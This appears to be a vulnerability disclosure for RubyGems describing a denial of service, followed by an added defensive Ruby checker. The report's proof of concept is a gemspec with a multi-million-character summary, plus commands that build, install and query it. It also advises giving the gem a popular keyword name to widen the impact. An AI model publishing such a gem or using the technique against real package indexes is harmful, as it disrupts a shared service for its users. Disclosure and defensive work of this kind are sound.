CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS2: 5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

EPSS: 0.025 Low
Percentile: 89.0%
Currently, there is no limit for summary length. I think pushing a gem whose summary is huge will make gem search unavailable.
This is not Arbitrary Code Execution, but it is really easy to attack. According to the CVSS v3.0 Calculator, the severity is High (7.5).
gem search -d <substring-of-the-name-of-the-gem>, but it will give no response. It may be good for the gem name to include a frequently-searched keyword, such as “foo-rails-bar” or “foo-sinatra-bar”.
Gem::Specification.new do |spec|
  spec.name = "huge-summary"
  spec.version = "0.0.1"
  spec.authors = ["Yusuke Endoh"]
  spec.email = ["[email protected]"]
  spec.summary = "foo" * 10000000
  spec.homepage = "http://example.com/"
  spec.license = "MIT"
end
gem build huge-summary.gemspec
gem install huge-summary-0.0.1.gem
gem query huge-summary -d
It will not answer.
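A defensive check for the issue reported above, as an added example (not code from the report or from RubyGems): it flags gemspec text fields that exceed a size limit and bounds the summary before it is displayed. The limit values and the helper names oversized_fields, display_summary and sample_spec are assumptions for illustration.

```ruby
require "rubygems"

# Assumed policy limits in bytes; illustrative values, not RubyGems' own.
FIELD_LIMITS = { summary: 1_000, description: 64_000 }.freeze

# Returns [field, bytesize, limit] for every text field over its limit.
# Intended to run before a gem is accepted into an index or a local mirror.
def oversized_fields(spec, limits = FIELD_LIMITS)
  limits.map do |field, limit|
    size = spec.public_send(field).to_s.bytesize
    [field, size, limit] if size > limit
  end.compact
end

# Returns the summary cut to at most `max` characters (plus an ellipsis),
# so listing code never formats an unbounded string.
def display_summary(spec, max = 200)
  text = spec.summary.to_s
  text.length > max ? "#{text[0, max]}..." : text
end

# Builds an in-memory specification with the given summary.
# Constructed sample data; nothing is written to disk or installed.
def sample_spec(summary)
  Gem::Specification.new do |s|
    s.name     = "sample-gem"
    s.version  = "0.0.1"
    s.authors  = ["Example Author"]
    s.summary  = summary
    s.homepage = "http://example.com/"
    s.license  = "MIT"
  end
end

if __FILE__ == $PROGRAM_NAME
  [sample_spec("A small gem"), sample_spec("foo" * 10_000)].each do |spec|
    problems = oversized_fields(spec)
    if problems.empty?
      puts "ok: #{display_summary(spec)}"
    else
      problems.each { |f, size, limit| puts "reject: #{f} is #{size} bytes (limit #{limit})" }
    end
  end
end
```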